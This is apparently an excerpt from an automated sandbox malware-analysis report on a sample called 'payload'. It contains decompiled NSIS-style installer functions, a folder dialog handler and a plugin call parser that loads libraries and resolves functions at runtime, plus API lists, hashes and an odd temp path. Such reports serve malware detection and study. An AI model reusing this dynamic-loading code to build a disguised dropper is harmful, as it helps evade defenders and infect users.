Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID:
API String ID: 590372296-0
Opcode ID: 110982b3b6e043dfb772c6262222abcf173b3562f202fb6bb9697052539c2ca3
Instruction ID: 36ba5585b1d224b9782629df23ee11add298fe1a6f2e37662bad4ed6ffe984ff
Opcode Fuzzy Hash: 110982b3b6e043dfb772c6262222abcf173b3562f202fb6bb9697052539c2ca3
Instruction Fuzzy Hash: 46A159B1900208BFDB119FA0DD85AAE7F79FB48355F10407AFA01B61A0C7B55E41DF69

Uniqueness

Uniqueness Score: -1.00%

Function 0040431C Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 274
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040431C(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x41f4e0;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x424000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E004054D3(0x3fb, _t146);
					E00405F64(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004054D3(0x3fb, _t146);
							if(E00405859(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405CF9(0x41ecd8, _t146);
							_t87 = E00406092(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405CF9(0x41ecd8, _t146);
								_t89 = E00405804(0x41ecd8);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41ecd8,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x41ecd8) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x41ecd8,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E004057B2(0x41ecd8);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x41ecd8) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E004047B0(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x422edc; // 0x6142c1
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404798(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x41ecc8);
									} else {
										E004046D3(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x4237a4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00403F00(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x41fcf8 == _t158) {
									E004042B1();
								}
								 *0x41fcf8 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x41fd08;
							_v60 = E0040466D;
							_v56 = _t146;
							_v68 = E00405D1B(_t146, 0x41fd08, _t166, 0x41f0e0, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E0040576B(_t146);
								_t125 =  *((intOrPtr*)( *0x423710 + 0x11c));
								if( *((intOrPtr*)( *0x423710 + 0x11c)) != 0 && _t146 == "C:\\Users\\Albus\\AppData\\Local\\Temp\\Distressingly\\Bloods\\Ultraevangelical") {
									E00405D1B(_t146, 0x41fd08, _t166, 0, _t125);
									if(lstrcmpiA(0x4226a0, 0x41fd08) != 0) {
										lstrcatA(_t146, 0x4226a0);
									}
								}
								 *0x41fcf8 =  *0x41fcf8 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E004057D8(_t146) != 0 && E00405804(_t146) == 0) {
						E0040576B(_t146);
					}
					 *0x422ed8 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403EDE(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403EDE(_t166);
					E00403F13(_t165);
					_t138 = E00406092(6);
					if(_t138 == 0) {
						L53:
						return E00403F45(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}

0x0040431c
0x00404322
0x00404328
0x00404335
0x00404343
0x00404346
0x0040434e
0x00404354
0x00404354
0x00404360
0x00404363
0x004043d1
0x004043d8
0x004044af
0x004044b6
0x004044c5
0x004044c5
0x004044c9
0x004044d3
0x004044e0
0x004044e2
0x004044e2
0x004044f0
0x004044f7
0x004044fe
0x00404501
0x00404538
0x0040453a
0x00404540
0x00404545
0x00404549
0x0040454b
0x0040454b
0x00404567
0x00000000
0x00404569
0x0040456c
0x0040457a
0x00404580
0x00404581
0x00404584
0x00404587
0x00000000
0x00404587
0x00404503
0x00404505
0x00404509
0x00000000
0x00000000
0x00000000
0x00000000
0x0040450b
0x0040450b
0x00404518
0x0040451d
0x00000000
0x00000000
0x00404521
0x00404523
0x00404523
0x0040452b
0x0040452d
0x00404530
0x00404533
0x00404536
0x00000000
0x00000000
0x00000000
0x00000000
0x00404536
0x00404593
0x0040459d
0x004045a0
0x004045a3
0x004045aa
0x004045aa
0x004045ac
0x004045ac
0x004045b1
0x004045b3
0x004045bb
0x004045c2
0x004045c4
0x004045cf
0x004045cf
0x004045c4
0x004045d6
0x004045df
0x004045e9
0x004045f1
0x0040460c
0x004045f3
0x004045fc
0x004045fc
0x004045f1
0x00404611
0x00404616
0x0040461b
0x00404624
0x00404624
0x0040462d
0x0040462f
0x0040462f
0x0040463b
0x00404643
0x0040464d
0x0040464d
0x00404652
0x00000000
0x00404652
0x00404501
0x004044b8
0x004044bf
0x00000000
0x00000000
0x00000000
0x004044bf
0x004043de
0x004043e7
0x00404401
0x00404406
0x00404410
0x00404417
0x00404423
0x00404426
0x00404429
0x00404430
0x00404438
0x0040443b
0x0040443f
0x00404446
0x0040444e
0x004044a8
0x00404450
0x00404451
0x00404458
0x00404462
0x0040446a
0x00404477
0x0040448b
0x0040448f
0x0040448f
0x0040448b
0x00404494
0x004044a1
0x004044a1
0x0040444e
0x00000000
0x00404406
0x004043f4
0x00000000
0x00000000
0x004043fa
0x00000000
0x00404365
0x00404372
0x0040437b
0x00404388
0x00404388
0x0040438f
0x00404395
0x0040439e
0x004043a1
0x004043a4
0x004043ac
0x004043af
0x004043b2
0x004043b8
0x004043bf
0x004043c6
0x00404658
0x0040466a
0x004043cc
0x004043cf
0x00000000
0x004043cf
0x004043c6

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040436B
SetWindowTextA.USER32(00000000,?), ref: 00404395
SHBrowseForFolderA.SHELL32(?,0041F0E0,?), ref: 00404446
CoTaskMemFree.OLE32(00000000), ref: 00404451
lstrcmpiA.KERNEL32(Call,0041FD08,00000000,?,?), ref: 00404483
lstrcatA.KERNEL32(?,Call), ref: 0040448F
SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044A1

Part of subcall function 004054D3: GetDlgItemTextA.USER32 ref: 004054E6

Part of subcall function 00405F64: CharNextA.USER32(?), ref: 00405FBC
Part of subcall function 00405F64: CharNextA.USER32(?), ref: 00405FC9
Part of subcall function 00405F64: CharNextA.USER32(?), ref: 00405FCE
Part of subcall function 00405F64: CharPrevA.USER32(?,?), ref: 00405FDE

GetDiskFreeSpaceA.KERNEL32(0041ECD8,?,?,0000040F,?,0041ECD8,0041ECD8,?,00000001,0041ECD8,?,?,000003FB,?), ref: 0040455F
MulDiv.KERNEL32 ref: 0040457A

Part of subcall function 004046D3: lstrlenA.KERNEL32(0041FD08,0041FD08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004045EE,000000DF,00000000,00000400,?), ref: 00404771
Part of subcall function 004046D3: wsprintfA.USER32 ref: 00404779
Part of subcall function 004046D3: SetDlgItemTextA.USER32(?,0041FD08), ref: 0040478C

Strings

Call, xrefs: 0040447D, 00404482, 0040448D
A, xrefs: 0040443F
C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical, xrefs: 0040446C

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical$Call
API String ID: 2624150263-1603118406
Opcode ID: 1558e11706ab6d26c01ec83b0c58713cad93a9e9ab837f02d5dc5529ec40a987
Instruction ID: 222947b4accbc62cc0073c5541b0f9589876626f1104fcc3d8441c992cea6716
Opcode Fuzzy Hash: 1558e11706ab6d26c01ec83b0c58713cad93a9e9ab837f02d5dc5529ec40a987
Instruction Fuzzy Hash: 71A17EB1900209ABDB11AFA5CC45BEFB6B8EF84315F14843BF711B62D1D77C8A418B69

Uniqueness

Uniqueness Score: -1.00%

Function 10001A5D Relevance: 20.0, APIs: 13, Instructions: 540
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E10001A5D() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				CHAR* _v24;
				CHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				CHAR* _v44;
				signed int _v48;
				void* _v52;
				intOrPtr _v56;
				CHAR* _t198;
				signed int _t201;
				void* _t203;
				void* _t205;
				CHAR* _t207;
				void* _t215;
				struct HINSTANCE__* _t216;
				struct HINSTANCE__* _t217;
				struct HINSTANCE__* _t219;
				signed short _t221;
				struct HINSTANCE__* _t224;
				struct HINSTANCE__* _t226;
				void* _t227;
				char* _t228;
				void* _t239;
				signed char _t240;
				signed int _t241;
				struct HINSTANCE__* _t247;
				void* _t248;
				signed int _t250;
				signed int _t252;
				signed int _t258;
				void* _t259;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t271;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				void* _t277;
				void* _t281;
				struct HINSTANCE__* _t283;
				signed char _t286;
				void _t287;
				signed int _t288;
				signed int _t300;
				signed int _t301;
				signed char _t307;
				signed int _t308;
				CHAR* _t309;
				CHAR* _t311;
				CHAR* _t312;
				struct HINSTANCE__* _t313;
				void* _t315;
				signed int _t316;
				void* _t317;

				_t283 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t317 = 0;
				_v48 = 0;
				_t198 = E10001215();
				_v24 = _t198;
				_v28 = _t198;
				_v44 = E10001215();
				_t308 = E1000123B();
				_v52 = _t308;
				_v12 = _t308;
				while(1) {
					_t201 = _v32;
					_v56 = _t201;
					if(_t201 != _t283 && _t317 == _t283) {
						break;
					}
					_t307 =  *_t308;
					_t286 = _t307;
					_t203 = _t286 - _t283;
					if(_t203 == 0) {
						_t33 =  &_v32;
						 *_t33 = _v32 | 0xffffffff;
						__eflags =  *_t33;
						L17:
						_t205 = _v56 - _t283;
						if(_t205 == 0) {
							 *_v28 =  *_v28 & 0x00000000;
							__eflags = _t317 - _t283;
							if(_t317 == _t283) {
								_t317 = GlobalAlloc(0x40, 0x14a4);
								 *(_t317 + 0x810) = _t283;
								 *(_t317 + 0x814) = _t283;
							}
							_t287 = _v36;
							_t43 = _t317 + 8; // 0x8
							_t207 = _t43;
							_t44 = _t317 + 0x408; // 0x408
							_t309 = _t44;
							 *_t317 = _t287;
							 *_t207 =  *_t207 & 0x00000000;
							 *(_t317 + 0x808) = _t283;
							 *_t309 =  *_t309 & 0x00000000;
							_t288 = _t287 - _t283;
							__eflags = _t288;
							 *(_t317 + 0x80c) = _t283;
							 *(_t317 + 4) = _t283;
							if(_t288 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L39;
								}
								_t315 = 0;
								GlobalFree(_t317);
								_t317 = E100012FE(_v24);
								__eflags = _t317 - _t283;
								if(_t317 == _t283) {
									goto L39;
								} else {
									goto L32;
								}
								while(1) {
									L32:
									_t239 =  *(_t317 + 0x14a0);
									__eflags = _t239 - _t283;
									if(_t239 == _t283) {
										break;
									}
									_t315 = _t317;
									_t317 = _t239;
									__eflags = _t317 - _t283;
									if(_t317 != _t283) {
										continue;
									}
									break;
								}
								__eflags = _t315 - _t283;
								if(_t315 != _t283) {
									 *(_t315 + 0x14a0) = _t283;
								}
								_t240 =  *(_t317 + 0x810);
								__eflags = _t240 & 0x00000008;
								if((_t240 & 0x00000008) == 0) {
									_t241 = _t240 | 0x00000002;
									__eflags = _t241;
									 *(_t317 + 0x810) = _t241;
								} else {
									_t317 = E10001534(_t317);
									 *(_t317 + 0x810) =  *(_t317 + 0x810) & 0xfffffff5;
								}
								goto L39;
							} else {
								_t300 = _t288 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									L28:
									lstrcpyA(_t207, _v44);
									L29:
									lstrcpyA(_t309, _v24);
									L39:
									_v12 = _v12 + 1;
									_v28 = _v24;
									L63:
									if(_v32 != 0xffffffff) {
										_t308 = _v12;
										continue;
									}
									break;
								}
								_t301 = _t300 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									goto L29;
								}
								__eflags = _t301 != 1;
								if(_t301 != 1) {
									goto L39;
								}
								goto L28;
							}
						}
						if(_t205 != 1) {
							goto L39;
						}
						_t247 = _v16;
						if(_v40 == _t283) {
							_t247 = _t247 - 1;
						}
						 *(_t317 + 0x814) = _t247;
						goto L39;
					}
					_t248 = _t203 - 0x23;
					if(_t248 == 0) {
						__eflags = _t308 - _v52;
						if(_t308 <= _v52) {
							L15:
							_v32 = _t283;
							_v36 = _t283;
							goto L17;
						}
						__eflags =  *((char*)(_t308 - 1)) - 0x3a;
						if( *((char*)(_t308 - 1)) != 0x3a) {
							goto L15;
						}
						__eflags = _v32 - _t283;
						if(_v32 == _t283) {
							L40:
							_t250 = _v32 - _t283;
							__eflags = _t250;
							if(_t250 == 0) {
								__eflags = _t307 - 0x2a;
								if(_t307 == 0x2a) {
									_v36 = 2;
									L61:
									_t308 = _v12;
									_v28 = _v24;
									_t283 = 0;
									__eflags = 0;
									L62:
									_t316 = _t308 + 1;
									__eflags = _t316;
									_v12 = _t316;
									goto L63;
								}
								__eflags = _t307 - 0x2d;
								if(_t307 == 0x2d) {
									L132:
									_t252 = _t308 + 1;
									__eflags =  *_t252 - 0x3e;
									if( *_t252 != 0x3e) {
										L134:
										_t252 = _t308 + 1;
										__eflags =  *_t252 - 0x3a;
										if( *_t252 != 0x3a) {
											L141:
											_v28 =  &(_v28[1]);
											 *_v28 = _t307;
											goto L62;
										}
										__eflags = _t307 - 0x2d;
										if(_t307 == 0x2d) {
											goto L141;
										}
										_v36 = 1;
										L137:
										_v12 = _t252;
										__eflags = _v28 - _v24;
										if(_v28 <= _v24) {
											 *_v44 =  *_v44 & 0x00000000;
										} else {
											 *_v28 =  *_v28 & 0x00000000;
											lstrcpyA(_v44, _v24);
										}
										goto L61;
									}
									_v36 = 3;
									goto L137;
								}
								__eflags = _t307 - 0x3a;
								if(_t307 != 0x3a) {
									goto L141;
								}
								__eflags = _t307 - 0x2d;
								if(_t307 != 0x2d) {
									goto L134;
								}
								goto L132;
							}
							_t258 = _t250 - 1;
							__eflags = _t258;
							if(_t258 == 0) {
								L74:
								_t259 = _t286 - 0x22;
								__eflags = _t259 - 0x55;
								if(_t259 > 0x55) {
									goto L61;
								}
								switch( *((intOrPtr*)(( *(_t259 + 0x1000215a) & 0x000000ff) * 4 +  &M100020F6))) {
									case 0:
										__eax = _v24;
										__edi = _v12;
										while(1) {
											__edi = __edi + 1;
											_v12 = __edi;
											__cl =  *__edi;
											__eflags = __cl - __dl;
											if(__cl != __dl) {
												goto L116;
											}
											L115:
											__eflags =  *(__edi + 1) - __dl;
											if( *(__edi + 1) != __dl) {
												L120:
												 *__eax =  *__eax & 0x00000000;
												__ebx = E10001224(_v24);
												goto L91;
											}
											L116:
											__eflags = __cl;
											if(__cl == 0) {
												goto L120;
											}
											__eflags = __cl - __dl;
											if(__cl == __dl) {
												__edi = __edi + 1;
												__eflags = __edi;
											}
											__cl =  *__edi;
											 *__eax =  *__edi;
											__eax = __eax + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__cl =  *__edi;
											__eflags = __cl - __dl;
											if(__cl != __dl) {
												goto L116;
											}
											goto L115;
										}
									case 1:
										_v8 = 1;
										goto L61;
									case 2:
										_v8 = _v8 | 0xffffffff;
										goto L61;
									case 3:
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v16 = _v16 + 1;
										goto L79;
									case 4:
										__eflags = _v20;
										if(_v20 != 0) {
											goto L61;
										}
										_v12 = _v12 - 1;
										__ebx = E10001215();
										 &_v12 = E100019FB( &_v12);
										__eax = E10001429(__edx, __eax, __edx, __ebx);
										goto L91;
									case 5:
										L99:
										_v20 = _v20 + 1;
										goto L61;
									case 6:
										_push(7);
										goto L107;
									case 7:
										_push(0x19);
										goto L127;
									case 8:
										_push(0x15);
										goto L127;
									case 9:
										_push(0x16);
										goto L127;
									case 0xa:
										_push(0x18);
										goto L127;
									case 0xb:
										_push(5);
										goto L107;
									case 0xc:
										__eax = 0;
										__eax = 1;
										goto L85;
									case 0xd:
										_push(6);
										goto L107;
									case 0xe:
										_push(2);
										goto L107;
									case 0xf:
										_push(3);
										goto L107;
									case 0x10:
										_push(0x17);
										L127:
										_pop(__ebx);
										goto L92;
									case 0x11:
										__eax =  &_v12;
										__eax = E100019FB( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										__eflags = __ebx - 0xb;
										if(__ebx < 0xb) {
											__ebx = __ebx + 0xa;
										}
										goto L91;
									case 0x12:
										__ebx = 0xffffffff;
										goto L92;
									case 0x13:
										_v48 = _v48 + 1;
										_push(3);
										_pop(__eax);
										goto L85;
									case 0x14:
										__eax = 0;
										__eflags = 0;
										goto L85;
									case 0x15:
										_push(4);
										L107:
										_pop(__eax);
										L85:
										__edi = _v16;
										__ecx =  *(0x1000305c + __eax * 4);
										__edi = _v16 << 5;
										__edx = 0;
										__edi = (_v16 << 5) + __esi;
										__edx = 1;
										__eflags = _v8 - 0xffffffff;
										_v40 = 1;
										 *(__edi + 0x818) = __eax;
										if(_v8 == 0xffffffff) {
											L87:
											__ecx = __edx;
											L88:
											__eflags = _v8 - __edx;
											 *(__edi + 0x828) = __ecx;
											if(_v8 == __edx) {
												__eax =  &_v12;
												__eax = E100019FB( &_v12);
												__eax = __eax + 1;
												__eflags = __eax;
												_v8 = __eax;
											}
											__eax = _v8;
											 *((intOrPtr*)(__edi + 0x81c)) = _v8;
											_t133 = _v16 + 0x41; // 0x41
											_t133 = _t133 << 5;
											__eax = 0;
											__eflags = 0;
											 *((intOrPtr*)((_t133 << 5) + __esi)) = 0;
											 *((intOrPtr*)(__edi + 0x830)) = 0;
											 *((intOrPtr*)(__edi + 0x82c)) = 0;
											goto L91;
										}
										__eflags = __ecx;
										if(__ecx > 0) {
											goto L88;
										}
										goto L87;
									case 0x16:
										_t261 =  *(_t317 + 0x814);
										__eflags = _t261 - _v16;
										if(_t261 > _v16) {
											_v16 = _t261;
										}
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v36 - 3 = _t261 - (_v36 == 3);
										if(_t261 != _v36 == 3) {
											L79:
											_v40 = 1;
										}
										goto L61;
									case 0x17:
										__eax =  &_v12;
										__eax = E100019FB( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										L91:
										__eflags = __ebx;
										if(__ebx == 0) {
											goto L61;
										}
										L92:
										__eflags = _v20;
										_v40 = 1;
										if(_v20 != 0) {
											L97:
											__eflags = _v20 - 1;
											if(_v20 == 1) {
												__eax = _v16;
												__eax = _v16 << 5;
												__eflags = __eax;
												 *(__eax + __esi + 0x82c) = __ebx;
											}
											goto L99;
										}
										_v16 = _v16 << 5;
										_t141 = __esi + 0x830; // 0x830
										__edi = (_v16 << 5) + _t141;
										__eax =  *__edi;
										__eflags = __eax - 0xffffffff;
										if(__eax <= 0xffffffff) {
											L95:
											__eax = GlobalFree(__eax);
											L96:
											 *__edi = __ebx;
											goto L97;
										}
										__eflags = __eax - 0x19;
										if(__eax <= 0x19) {
											goto L96;
										}
										goto L95;
									case 0x18:
										goto L61;
								}
							}
							_t262 = _t258 - 1;
							__eflags = _t262;
							if(_t262 == 0) {
								_v16 = _t283;
								goto L74;
							}
							__eflags = _t262 != 1;
							if(_t262 != 1) {
								goto L141;
							}
							_t265 = _t286 - 0x21;
							__eflags = _t265;
							if(_t265 == 0) {
								_v8 =  ~_v8;
								goto L61;
							}
							_t266 = _t265 - 0x42;
							__eflags = _t266;
							if(_t266 == 0) {
								L57:
								__eflags = _v8 - 1;
								if(_v8 != 1) {
									_t92 = _t317 + 0x810;
									 *_t92 =  *(_t317 + 0x810) &  !0x00000001;
									__eflags =  *_t92;
								} else {
									 *(_t317 + 0x810) =  *(_t317 + 0x810) | 1;
								}
								_v8 = 1;
								goto L61;
							}
							_t271 = _t266;
							__eflags = _t271;
							if(_t271 == 0) {
								_push(0x20);
								L56:
								_pop(1);
								goto L57;
							}
							_t272 = _t271 - 9;
							__eflags = _t272;
							if(_t272 == 0) {
								_push(8);
								goto L56;
							}
							_t273 = _t272 - 4;
							__eflags = _t273;
							if(_t273 == 0) {
								_push(4);
								goto L56;
							}
							_t274 = _t273 - 1;
							__eflags = _t274;
							if(_t274 == 0) {
								_push(0x10);
								goto L56;
							}
							__eflags = _t274 != 0;
							if(_t274 != 0) {
								goto L61;
							}
							_push(0x40);
							goto L56;
						}
						goto L15;
					}
					_t277 = _t248 - 5;
					if(_t277 == 0) {
						__eflags = _v36 - 3;
						_v32 = 1;
						_v8 = _t283;
						_v20 = _t283;
						_v16 = (0 | _v36 == 0x00000003) + 1;
						_v40 = _t283;
						goto L17;
					}
					_t281 = _t277 - 1;
					if(_t281 == 0) {
						_v32 = 2;
						_v8 = _t283;
						_v20 = _t283;
						goto L17;
					}
					if(_t281 != 0x16) {
						goto L40;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L17;
					}
				}
				GlobalFree(_v52);
				GlobalFree(_v24);
				GlobalFree(_v44);
				if(_t317 == _t283 ||  *(_t317 + 0x80c) != _t283) {
					L161:
					return _t317;
				} else {
					_t215 =  *_t317 - 1;
					if(_t215 == 0) {
						_t178 = _t317 + 8; // 0x8
						_t311 = _t178;
						__eflags =  *_t311;
						if( *_t311 != 0) {
							_t216 = GetModuleHandleA(_t311);
							__eflags = _t216 - _t283;
							 *(_t317 + 0x808) = _t216;
							if(_t216 != _t283) {
								L150:
								_t183 = _t317 + 0x408; // 0x408
								_t312 = _t183;
								_t217 = E100015A4( *(_t317 + 0x808), _t312);
								__eflags = _t217 - _t283;
								 *(_t317 + 0x80c) = _t217;
								if(_t217 == _t283) {
									__eflags =  *_t312 - 0x23;
									if( *_t312 == 0x23) {
										_t186 = _t317 + 0x409; // 0x409
										_t221 = E100012FE(_t186);
										__eflags = _t221 - _t283;
										if(_t221 != _t283) {
											__eflags = _t221 & 0xffff0000;
											if((_t221 & 0xffff0000) == 0) {
												 *(_t317 + 0x80c) = GetProcAddress( *(_t317 + 0x808), _t221 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v48 - _t283;
								if(_v48 != _t283) {
									L157:
									_t312[lstrlenA(_t312)] = 0x41;
									_t219 = E100015A4( *(_t317 + 0x808), _t312);
									__eflags = _t219 - _t283;
									if(_t219 != _t283) {
										L145:
										 *(_t317 + 0x80c) = _t219;
										goto L161;
									}
									__eflags =  *(_t317 + 0x80c) - _t283;
									L159:
									if(__eflags != 0) {
										goto L161;
									}
									L160:
									_t196 = _t317 + 4;
									 *_t196 =  *(_t317 + 4) | 0xffffffff;
									__eflags =  *_t196;
									goto L161;
								} else {
									__eflags =  *(_t317 + 0x80c) - _t283;
									if( *(_t317 + 0x80c) != _t283) {
										goto L161;
									}
									goto L157;
								}
							}
							_t224 = LoadLibraryA(_t311);
							__eflags = _t224 - _t283;
							 *(_t317 + 0x808) = _t224;
							if(_t224 == _t283) {
								goto L160;
							}
							goto L150;
						}
						_t179 = _t317 + 0x408; // 0x408
						_t226 = E100012FE(_t179);
						 *(_t317 + 0x80c) = _t226;
						__eflags = _t226 - _t283;
						goto L159;
					}
					_t227 = _t215 - 1;
					if(_t227 == 0) {
						_t176 = _t317 + 0x408; // 0x408
						_t228 = _t176;
						__eflags =  *_t228;
						if( *_t228 == 0) {
							goto L161;
						}
						_t219 = E100012FE(_t228);
						L144:
						goto L145;
					}
					if(_t227 != 1) {
						goto L161;
					}
					_t80 = _t317 + 8; // 0x8
					_t284 = _t80;
					_t313 = E100012FE(_t80);
					 *(_t317 + 0x808) = _t313;
					if(_t313 == 0) {
						goto L160;
					}
					 *(_t317 + 0x84c) =  *(_t317 + 0x84c) & 0x00000000;
					 *((intOrPtr*)(_t317 + 0x850)) = E10001224(_t284);
					 *(_t317 + 0x83c) =  *(_t317 + 0x83c) & 0x00000000;
					 *((intOrPtr*)(_t317 + 0x848)) = 1;
					 *((intOrPtr*)(_t317 + 0x838)) = 1;
					_t89 = _t317 + 0x408; // 0x408
					_t219 =  *(_t313->i + E100012FE(_t89) * 4);
					goto L144;
				}
			}

0x10001a65
0x10001a68
0x10001a6b
0x10001a6e
0x10001a71
0x10001a74
0x10001a77
0x10001a79
